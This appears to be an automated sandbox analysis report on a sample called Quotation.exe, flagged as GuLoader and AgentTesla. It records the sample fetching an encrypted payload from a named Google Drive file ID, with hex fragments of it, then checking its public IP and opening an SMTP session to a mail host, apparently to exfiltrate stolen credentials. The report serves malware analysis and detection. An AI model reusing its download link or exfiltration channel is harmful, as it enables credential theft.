                                                                                  Oct 31, 2024 10:45:30.851639032 CET5874997667.23.226.139192.168.2.9
                                                                                  Oct 31, 2024 10:45:30.851706982 CET5874997667.23.226.139192.168.2.9
                                                                                  Oct 31, 2024 10:45:31.011070013 CET5874997667.23.226.139192.168.2.9
                                                                                  Oct 31, 2024 10:45:31.061054945 CET49976587192.168.2.967.23.226.139
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Oct 31, 2024 10:45:19.168256998 CET5920653192.168.2.91.1.1.1
                                                                                  Oct 31, 2024 10:45:19.175139904 CET53592061.1.1.1192.168.2.9
                                                                                  Oct 31, 2024 10:45:20.686918974 CET6098953192.168.2.91.1.1.1
                                                                                  Oct 31, 2024 10:45:20.694693089 CET53609891.1.1.1192.168.2.9
                                                                                  Oct 31, 2024 10:45:25.783711910 CET6282053192.168.2.91.1.1.1
                                                                                  Oct 31, 2024 10:45:25.792222977 CET53628201.1.1.1192.168.2.9
                                                                                  Oct 31, 2024 10:45:27.825550079 CET6277953192.168.2.91.1.1.1
                                                                                  Oct 31, 2024 10:45:28.530518055 CET53627791.1.1.1192.168.2.9
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Oct 31, 2024 10:45:19.168256998 CET192.168.2.91.1.1.10x8c7fStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                  Oct 31, 2024 10:45:20.686918974 CET192.168.2.91.1.1.10x553cStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                  Oct 31, 2024 10:45:25.783711910 CET192.168.2.91.1.1.10x231eStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                  Oct 31, 2024 10:45:27.825550079 CET192.168.2.91.1.1.10x6dd4Standard query (0)mail.showpiece.trillennium.bizA (IP address)IN (0x0001)false
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Oct 31, 2024 10:45:19.175139904 CET1.1.1.1192.168.2.90x8c7fNo error (0)drive.google.com142.250.185.238A (IP address)IN (0x0001)false
                                                                                  Oct 31, 2024 10:45:20.694693089 CET1.1.1.1192.168.2.90x553cNo error (0)drive.usercontent.google.com172.217.16.129A (IP address)IN (0x0001)false
                                                                                  Oct 31, 2024 10:45:25.792222977 CET1.1.1.1192.168.2.90x231eNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                  Oct 31, 2024 10:45:25.792222977 CET1.1.1.1192.168.2.90x231eNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                  Oct 31, 2024 10:45:25.792222977 CET1.1.1.1192.168.2.90x231eNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                  Oct 31, 2024 10:45:28.530518055 CET1.1.1.1192.168.2.90x6dd4No error (0)mail.showpiece.trillennium.bizshowpiece.trillennium.bizCNAME (Canonical name)IN (0x0001)false
                                                                                  Oct 31, 2024 10:45:28.530518055 CET1.1.1.1192.168.2.90x6dd4No error (0)showpiece.trillennium.biz67.23.226.139A (IP address)IN (0x0001)false
                                                                                  • drive.google.com
                                                                                  • drive.usercontent.google.com
                                                                                  • api.ipify.org
                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.949973142.250.185.2384431212C:\Users\user\Desktop\Quotation.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-31 09:45:20 UTC216OUTGET /uc?export=download&id=1Of5kNy0BP9ETJWGaeMWfLrbVk-DyWIxf HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  2024-10-31 09:45:20 UTC1610INHTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Thu, 31 Oct 2024 09:45:20 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1Of5kNy0BP9ETJWGaeMWfLrbVk-DyWIxf&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Content-Security-Policy: script-src 'nonce-kxZVxB2RFUhkNEmFRg1W9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.949974172.217.16.1294431212C:\Users\user\Desktop\Quotation.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-31 09:45:21 UTC258OUTGET /download?id=1Of5kNy0BP9ETJWGaeMWfLrbVk-DyWIxf&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  2024-10-31 09:45:24 UTC4915INHTTP/1.1 200 OK
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Security-Policy: sandbox
                                                                                  Content-Security-Policy: default-src 'none'
                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                  X-Content-Security-Policy: sandbox
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Content-Disposition: attachment; filename="oCyyum127.bin"
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Access-Control-Allow-Credentials: false
                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 240192
                                                                                  Last-Modified: Wed, 30 Oct 2024 08:37:31 GMT
                                                                                  X-GUploader-UploadID: AHmUCY2kZK4YgmhOWRV8smChwiaYRV95Zu4EeGOWyv1Ulz4mK9rRx1xeT1o5f4LhEGxxDa3LtRib3ZQWXQ
                                                                                  Date: Thu, 31 Oct 2024 09:45:23 GMT
                                                                                  Expires: Thu, 31 Oct 2024 09:45:23 GMT
                                                                                  Cache-Control: private, max-age=0
                                                                                  X-Goog-Hash: crc32c=R8aO1Q==
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close
                                                                                  2024-10-31 09:45:24 UTC4915INData Raw: 19 8f 66 49 96 b1 24 ae ce 0b c5 6c 0b a5 9f 93 73 eb a0 4e f8 a2 2c 0b 32 da 39 75 16 f9 9f 37 d7 9e a2 bc fd ba 21 e0 83 20 8e 6f cf 91 18 3e fa a0 4b e3 cb be d0 cf 25 67 46 85 da 05 ff 64 d8 5b 1f aa 14 db 9d b7 3b 7a 17 e1 93 0a 02 b7 92 d9 5f 04 7b 3a ec 5e b0 ef b5 d5 c3 62 33 ec 76 50 da 00 9e 35 6a 5f 78 92 5f 57 59 56 0e fd 57 18 ba 9c 48 ef 71 04 52 04 5e 0a 53 b8 5d ad aa 87 fd 52 71 c1 47 92 b4 f0 27 9f aa f0 02 9f ef 9b 55 d7 f2 fd bd 43 6e 1d 53 aa 9c a8 00 03 69 a2 93 99 80 48 ab 1d e9 ea 6c 9e a7 bf 47 2d 39 80 b0 18 eb 50 56 94 d0 c2 77 f3 51 99 8c 90 58 55 e4 46 d9 0f ee 42 af a7 1a e6 95 83 40 0d 16 ef da 75 97 29 6b 23 0c e3 18 89 cb 8e 32 55 36 7f d3 74 26 48 59 54 7f 74 b7 a8 ce 9c c2 fe d7 69 b7 34 dc 38 de 10 7f ad ad af 18 38 92
                                                                                  Data Ascii: fI$lsN,29u7! o>K%gFd[;z_{:^b3vP5j_x_WYVWHqR^S]RqG'UCnSiHlG-9PVwQXUFB@u)k#2U6t&HYTti488
                                                                                  2024-10-31 09:45:24 UTC4866INData Raw: b3 e0 e1 81 10 fa 00 5a 11 f7 e4 1f 9a b2 43 37 7f b7 b9 7b ac bb 28 0b 88 03 19 77 76 c7 bf e8 11 0e 7f bc 62 5b c7 0e 57 ef 97 4f 2a 47 e8 20 cf 7b 27 0f 73 d4 e2 15 a9 6a e5 7b 2f 81 28 ea b0 ff e6 69 16 9e 01 df 0a 3e e6 e4 58 88 3a 11 15 f4 8d 71 1f 6c 9d 2a 6d 66 33 f4 f0 39 64 37 22 7d 82 21 20 d9 dd a1 d8 2f 75 d6 25 31 cc ef 04 53 9f 54 15 5d 15 34 5b a7 38 00 22 45 44 4c e9 58 c8 31 a7 4c b9 32 6b d9 f2 1c a5 1d 4c d7 e0 42 c5 92 41 41 a1 e4 a2 96 33 3e 4a e6 c1 8f 2e e3 4f 41 e8 40 c0 e2 13 bc 0c 13 06 b1 b8 fb 97 16 6f b4 bf 1e 10 a4 9f 7e 7f 4a 82 bf 09 b8 62 43 bd 89 25 1f 30 e4 33 81 87 99 89 41 d8 de 2e 8c 34 2e 22 7b a3 75 42 e8 14 2f c0 8a 7c 27 cf 65 a9 c5 9f b1 0d c6 48 86 11 27 b5 bd 2d 13 5a 9d a2 82 db 2e c3 a1 9e 57 48 af 32 fb e0
                                                                                  Data Ascii: ZC7{(wvb[WO*G {'sj{/(i>X:ql*mf39d7"}! /u%1ST]4[8"EDLX1L2kLBAA3>J.OA@o~JbC%03A.4."{uB/|'eH'-Z.WH2
                                                                                  2024-10-31 09:45:24 UTC1378INData Raw: 1f 22 76 95 13 54 be bf 30 a1 a1 83 d2 f7 4b 6c ae 05 66 62 b9 cf 84 7a 61 76 d4 47 23 8b dc ac fc 13 74 92 14 74 2e 9b d5 a2 a5 11 94 a2 1d 99 96 03 81 63 1c 34 43 a7 d1 ae b7 91 f2 8f d3 f1 14 81 0b d1 e6 28 99 17 ce 12 32 5c 61 6e 7c 16 6c 91 da 1a f4 02 15 7e 53 38 d5 b7 cf f2 dc bc d9 fb 30 df 0a 38 5f 37 de 70 1b 19 a8 61 46 2e 89 14 47 2a 16 b4 1d ac 0b f6 cb 04 70 f5 5a aa a1 37 f8 19 29 c6 5e 2c 4e dd bb 13 c8 b8 8d 2f 80 98 dc 85 16 92 d1 01 6b 2f fd 01 e0 da 61 1f e3 ed 33 11 1b 1a 87 8a 6d 37 39 d9 d4 20 58 21 29 6d fc 1a 08 c6 14 5a 17 05 a7 e8 83 1f 10 ef 61 74 be 2e a2 f3 99 42 21 c9 f6 64 ed 5f ab 4b a6 75 42 09 6b bc 62 58 2b f7 ba 85 20 1c 5d 7a 40 e4 01 3d 72 34 c1 69 ab 6c 40 aa 39 b3 fc 05 05 38 6b f7 cd 06 81 76 71 6a 2d 95 c7 bb b5
                                                                                  Data Ascii: "vT0KlfbzavG#tt.c4C(2\an|l~S808_7paF.G*pZ7)^,N/k/a3m79 X!)mZat.B!d_KuBkbX+ ]z@=r4il@98kvqj-
                                                                                  2024-10-31 09:45:24 UTC1378INData Raw: 1b 9e 2e 59 99 b6 03 7f 6d 1c ca 6d b7 d1 ae 49 63 ff 83 f3 f7 ea 8d 07 2f c7 15 9c 17 ce ec 0b 60 43 6e 7c 2e 64 65 25 e5 f6 3d 15 7e 4a 28 c6 b7 d6 f3 b6 e4 f9 bb 30 ce 20 c6 51 33 de ae 10 1a a8 59 bd 21 85 14 47 2a 16 bb 1d ac 1a f6 cb 04 70 f5 5a a7 a1 37 f8 19 29 c2 5e fa 7c dc bb 59 5e fc 8d 2f a1 60 d2 85 16 4c ca 02 6b 2f fd 03 ef da 41 e3 ef e1 33 cf 13 23 96 8a 93 36 fe c3 d4 20 a6 d1 24 68 dc 31 49 c6 14 ae e7 08 a7 e8 5d 19 13 ef 41 8e b0 22 a2 0d 66 77 0e c9 d6 67 13 56 ab b5 db 2f 58 09 6f 42 90 56 29 09 48 88 21 34 30 38 40 cf f5 cd 7c 37 e1 4c af 6c 40 54 c9 be f0 05 fb ca 64 fb ed 27 a1 76 71 94 d2 ad e8 ad b5 4a ed 0f 9b ac 8a 92 25 17 e1 d7 bd b1 88 d6 19 be ed e3 36 e8 45 6c 3c 2e ae 57 bf ab fc a4 86 24 02 bd 2d 3b 07 fb bd 55 39 19
                                                                                  Data Ascii: .YmmIc/`Cn|.de%=~J(0 Q3Y!G*pZ7)^|Y^/`Lk/A3#6 $h1I]A"fwgV/XoBV)H!408@|7Ll@Td'vqJ%6El<.W$-;U9
                                                                                  2024-10-31 09:45:24 UTC1378INData Raw: 15 7e 59 e6 c4 8e c1 f2 b6 e4 c9 cb 30 df 00 e6 58 33 de 50 e0 17 ab 61 b8 de 89 17 47 f4 11 b8 1d 8c e1 f7 f2 24 8e f4 63 4f a8 37 f8 9c 41 c2 5e 00 8e d0 ba 19 3f 9b 8d 2f 85 09 e9 85 16 b4 e4 0d 6b 2f 03 f1 e2 d9 61 e1 11 ed 30 31 32 1a 87 8a 93 c8 01 f6 de 20 58 df 25 48 fd 32 49 c6 ea 5e ea 0b a7 16 af 16 10 cf 6d 8a b0 22 5c f2 5e 4b 2d c9 d6 5f e8 5f ab b5 9f 92 a5 f6 94 c2 d0 54 29 fd ba 80 20 1c cc 31 42 e4 f5 ca 7f 37 e9 7a af 6c 46 80 c7 a6 c0 00 05 d6 66 fb cd 2d a1 76 60 4a d3 94 fe ad 4b 44 10 06 a3 df f1 f1 25 17 1b 25 b0 b1 a8 f4 1b be ed 1d c9 df 48 6c 3c d0 9a 89 bf 8b ff 84 85 24 fc bc ea 2a 04 fb bd 55 39 1b 9d cc b9 01 ef 5e 79 97 95 19 95 58 92 6d 73 c6 50 49 62 de 2f 87 87 48 2b 31 ae c0 5e 60 92 d3 d1 29 6c c9 19 e4 ed 1c ea 33 e7
                                                                                  Data Ascii: ~Y0X3PaG$cO7A^?/k/a012 X%H2I^m"\^K-__T) 1B7zlFf-v`JKD%%Hl<$*U9^yXmsPIb/H+1^`)l3
                                                                                  2024-10-31 09:45:24 UTC1378INData Raw: 26 d8 e7 25 c2 5e fa 7e df bb 21 c5 fc 8d 2f 81 98 de 87 16 92 c5 01 6b 2f fd 0e d5 c6 61 e1 ef 1f 3a 31 12 61 f3 8a 93 32 28 93 d4 20 52 e5 88 68 fc 32 69 c4 14 50 e9 f5 a9 ea a3 15 ee e3 63 8a 90 20 a2 f3 67 b0 2c f0 c4 67 ed 5f 8b b5 a7 4c 58 f7 65 bc 9c 74 2a f7 44 89 df 12 30 38 40 1a 07 c1 7c 17 c1 49 af 6c be ab fe b7 f0 05 05 c6 47 fa cd 26 a1 88 7f 68 d3 94 00 a1 b7 4a 33 05 9b ac f1 0f 24 2e e0 29 b3 b1 b0 f3 1b be ed db b2 19 b9 93 c2 d9 a2 54 c4 fe ff a4 82 01 02 b2 15 24 f9 f6 bd ab 1d 45 9d ec b2 ff e6 5e 87 ed d8 0b 95 5c ba 4b 73 c6 56 b7 95 d0 2f f5 9c 48 2b 41 d3 4a 50 63 96 0e 3c 25 6f c9 c7 e8 ed 1c d3 c4 e6 53 e0 bc 3f 40 6e 5d b2 8b 3c 26 35 41 1a 2a f2 85 b7 d4 f1 cd b8 f9 7c 59 95 ea 00 98 68 2f 4a 54 8d 2a 2e 29 22 80 bc 31 fb f1
                                                                                  Data Ascii: &%^~!/k/a:1a2( Rh2iPc g,g_LXet*D08@|IlG&hJ3$.)T$E^\KsV/H+AJPc<%oS?@n]<&5A*|Yh/JT*.)"1
                                                                                  2024-10-31 09:45:24 UTC1378INData Raw: fc 6d 58 df 23 48 ff 32 49 c6 ea 5e e9 0b a7 16 af 15 10 cf 68 8a b0 22 5c f2 5e 6d 2d c9 d6 99 e4 5f ab 9d e2 4c 58 0f 95 b5 9d 54 09 84 44 89 21 e2 33 67 79 e9 09 c3 7c 17 cb 49 af 6c be a4 c7 bd f0 fb 09 c6 67 db da 26 a1 76 8f 6b ea 9e fe ad b5 60 33 1e 9b ac f1 0f 2b 17 e5 29 4d bd 88 f6 3b f4 ed e3 c8 18 47 55 36 d0 a2 54 95 ab b4 a4 86 24 02 b2 14 24 07 05 b1 ab 35 38 fc ec b8 01 11 5f be b4 ac 0b 95 a6 9b 4d 73 e3 2b 3d 9c d0 2b f5 2b 4e 2b 41 86 25 50 63 98 ae 5b 25 6f cd 19 86 ed 1c ea 33 e8 53 e0 42 cd 4d 6e 75 cc b9 3c 2c e9 95 1a 03 f8 85 b5 d4 4f ed b3 35 7c 4a 6b e4 00 98 7b e1 45 54 da 0b 69 29 2f 80 42 21 e2 fb 96 64 1d 6f 26 e9 22 72 f5 d1 06 25 1a 64 b3 6f 57 fe 5e 24 53 e2 5f 45 71 a8 12 03 88 fd 18 2c db e5 47 e4 a6 5e 57 62 2e c2 6f
                                                                                  Data Ascii: mX#H2I^h"\^m-_LXTD!3gy|Ilg&vk`3+)M;GU6T$$58_Ms+=++N+A%Pc[%o3SBMnu<,O5|Jk{ETi)/B!do&"r%doW^$S_Eq,G^Wb.o
                                                                                  2024-10-31 09:45:24 UTC1378INData Raw: 74 15 f7 44 89 df 1d 0b 2f 40 e4 0b 3d 75 36 c1 69 df 6c 40 aa 87 d6 0d fa fa e6 5a fb cd 26 5f 78 71 6a d3 6a f2 ad b5 6a 1b 06 9b ac 0f f0 1c 1d e5 29 b3 9b a8 ff 1b be ed 1d c6 e6 46 6c c2 dc a2 54 9f b2 ff a4 86 da fd 85 03 24 07 fb 43 a2 34 18 bd e1 b8 01 ef 1e 28 69 53 f4 b5 62 92 4d 73 38 5e 49 9c d0 d1 8b a7 4a 0b 14 ae 3e 50 9d 93 ea 0d 25 6f c9 c7 ed ed 1c cf b6 92 53 e0 46 41 9f 6a 75 9c a3 27 2c e9 61 66 4e f2 85 b1 f4 43 cd 80 35 82 44 95 ea 00 66 77 1f 49 74 f1 2b 2e 29 d1 81 85 02 db f1 96 9a 14 45 06 84 59 06 f5 2f 0c 57 f0 60 4d 13 7f e5 7e 6a 59 9f 2b bb 70 95 25 2f 88 fd e6 db d4 e5 67 92 58 52 57 22 3c 84 6f 25 2b 7d c4 09 5b da c1 21 22 05 b1 70 bf e8 3b 2e 76 a2 b0 69 8e 07 3b 12 6e 68 b7 ea b5 e2 40 07 52 ab bc c2 3d f2 26 45 1f ff
                                                                                  Data Ascii: tD/@=u6il@Z&_xqjjj)FlT$C4(iSbMs8^IJ>P%oSFAju',afNC5DfwIt+.)EY/W`M~jY+p%/gXRW"<o%+}[!"p;.vi;nh@R=&E
                                                                                  2024-10-31 09:45:24 UTC1378INData Raw: 65 a5 f1 f1 00 6c 91 29 b3 b5 fa 7c 1e be 9d cb d3 e6 46 66 41 a4 a2 54 bb ab ac a4 86 24 02 b2 14 24 07 05 b1 ab 35 38 97 ec b8 01 11 5f be b4 ac 0b 95 a6 9b 4d 73 e3 2b 3d 9c d0 2b f5 33 4f 2b 41 86 25 50 63 98 ae 5b 25 6f cd 19 ef ed 1c ea 33 e8 53 e0 42 cd 4d 6e 75 cc 86 3c 2c e9 95 1a 03 d0 85 b5 d4 9b c4 80 35 59 31 e1 ea 00 9c 09 b9 4c 54 aa 03 35 29 2f 8a c1 54 db f1 92 44 13 45 06 a1 dc 7c f5 2f 08 db 16 64 4d 43 54 fe 7e 6a ad e3 66 ac 70 91 05 fd 81 fc e6 05 d2 e5 67 92 e6 92 a0 dd e3 ed 6b 25 2b 83 3b 3e 79 da c1 df d0 0c b1 50 d2 93 4f 2e 88 a7 fb 86 8a 07 4b c4 7c 69 b7 c0 bc 96 40 07 16 69 f4 c2 3d d2 91 4b 1f ff 9a ee ba a0 b3 1e 13 8f 14 da 62 65 10 f7 1a 1e 5d a9 47 37 5f 4a b0 7a ac 65 53 32 99 03 59 a5 72 34 41 c8 b4 00 7f bc bc 51 c7
                                                                                  Data Ascii: el)|FfAT$$58_Ms+=+3O+A%Pc[%o3SBMnu<,5Y1LT5)/TDE|/dMCT~jfpgk%+;>yPO.K|i@i=Kbe]G7_JzeS2Yr4AQ
                                                                                  2024-10-31 09:45:24 UTC1378INData Raw: 21 be 5e 87 96 52 0a ac 4f 92 4d 73 38 59 48 9c f0 58 87 a7 4a 6b ef 5f c1 af 43 c0 d3 2f 25 91 c7 39 e4 ed e2 e6 cd e6 73 d4 42 33 41 90 74 d5 a9 3c 2c e9 95 12 3a f2 a0 ce a0 65 cd 84 47 4e 4c 95 9a 28 83 7b 1f 43 29 ae 2b 2e 2d 0f b5 bc 20 db 0f 98 64 1d 45 f8 ad 22 72 d5 76 08 25 1a 9a 4c 5a 5d fe 7e 6a 79 c2 05 bb 70 91 fb 0d 88 fd e6 db d6 e5 67 b2 85 5e 57 22 e2 cc 56 2f 2b 83 c5 1a 59 fe c1 21 dc f2 bf 70 9a 93 b1 22 76 a6 e2 89 8a 07 4b c4 74 51 a0 e0 c8 96 be 0e 57 8b d6 e4 3d f2 d8 0b 28 08 9b 1f 9a b9 b3 e0 1f 71 1a fa 38 65 ee fb e4 1f 44 cf 47 37 5f 4a b8 42 83 45 29 32 67 0a 19 77 ad b0 ca e8 ef 04 81 b5 42 5f 39 07 56 11 b1 04 2a 47 10 43 a9 7b 07 04 5b cf e2 eb a2 2e 83 7b 2f 85 7b 8c b0 ff ec 69 16 9f 01 ff f6 32 e6 e4 86 aa 3e 11 15 f4
                                                                                  Data Ascii: !^ROMs8YHXJk_C/%9sB3At<,:eGNL({C)+.- dE"rv%LZ]~jypg^W"V/+Y!p"vKtQW=(q8eDG7_JBE)2gwB_9V*GC{[.{/{i2>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.949975172.67.74.1524431212C:\Users\user\Desktop\Quotation.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-31 09:45:26 UTC155OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                  Host: api.ipify.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-10-31 09:45:26 UTC211INHTTP/1.1 200 OK
                                                                                  Date: Thu, 31 Oct 2024 09:45:26 GMT
                                                                                  Content-Type: text/plain
                                                                                  Content-Length: 14
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8db2b6549e174755-DFW
                                                                                  2024-10-31 09:45:26 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37
                                                                                  Data Ascii: 173.254.250.77


                                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                                  Oct 31, 2024 10:45:29.273474932 CET5874997667.23.226.139192.168.2.9220-super.nseasy.com ESMTP Exim 4.96.2 #2 Thu, 31 Oct 2024 05:45:29 -0400
                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                  220 and/or bulk e-mail.
                                                                                  Oct 31, 2024 10:45:29.273715973 CET49976587192.168.2.967.23.226.139EHLO 897506
                                                                                  Oct 31, 2024 10:45:29.436853886 CET5874997667.23.226.139192.168.2.9250-super.nseasy.com Hello 897506 [173.254.250.77]
                                                                                  250-SIZE 52428800
                                                                                  250-8BITMIME
                                                                                  250-PIPELINING
                                                                                  250-PIPECONNECT
                                                                                  250-STARTTLS
                                                                                  250 HELP
                                                                                  Oct 31, 2024 10:45:29.437043905 CET49976587192.168.2.967.23.226.139STARTTLS
                                                                                  Oct 31, 2024 10:45:29.587775946 CET5874997667.23.226.139192.168.2.9220 TLS go ahead

                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to dive into process behavior distribution

                                                                                  Click to jump to process

                                                                                  Target ID:0
                                                                                  Start time:05:44:04
                                                                                  Start date:31/10/2024
                                                                                  Path:C:\Users\user\Desktop\Quotation.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\Quotation.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:1'197'176 bytes
                                                                                  MD5 hash:5607E8B6D0197E51EC19233E72BC2036
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1962376405.00000000059AE000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:05:45:05
                                                                                  Start date:31/10/2024
                                                                                  Path:C:\Users\user\Desktop\Quotation.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\Quotation.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:1'197'176 bytes
                                                                                  MD5 hash:5607E8B6D0197E51EC19233E72BC2036
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2623639299.0000000036293000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2623639299.000000003628B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2623639299.0000000036261000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2623639299.0000000036261000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:false

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:30.7%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:27.2%
                                                                                    Total number of Nodes:826
                                                                                    Total number of Limit Nodes:18
                                                                                    execution_graph 3281 70021000 3284 7002101b 3281->3284 3291 7002156c 3284->3291 3286 70021020 3287 70021032 3286->3287 3288 70021024 GlobalAlloc 3286->3288 3289 700215c5 2 API calls 3287->3289 3288->3287 3290 70021019 3289->3290 3293 70021572 3291->3293 3292 70021578 3292->3286 3293->3292 3294 70021584 GlobalFree 3293->3294 3294->3286 3295 700212c6 3296 7002101b 4 API calls 3295->3296 3297 700212df 3296->3297 3298 70021aa7 3299 7002156c GlobalFree 3298->3299 3301 70021abf 3299->3301 3300 70021b01 GlobalFree 3301->3300 3302 70021add 3301->3302 3303 70021aed VirtualFree 3301->3303 3302->3300 3303->3300 3304 700210c7 3316 700210f8 3304->3316 3305 700212be GlobalFree 3306 700211d7 GlobalAlloc 3306->3316 3307 70021258 GlobalFree 3307->3316 3308 70021548 3 API calls 3308->3316 3309 700212ba 3309->3305 3310 70021296 GlobalFree 3310->3316 3311 700215eb 2 API calls 3313 700211ca GlobalFree 3311->3313 3312 70021638 lstrcpyW 3315 700211ab GlobalFree 3312->3315 3313->3316 3314 70021165 GlobalAlloc 3314->3316 3315->3316 3316->3305 3316->3306 3316->3307 3316->3308 3316->3309 3316->3310 3316->3311 3316->3312 3316->3314 3317 70021cc7 3318 70021cee 3317->3318 3319 70021d2f GlobalFree 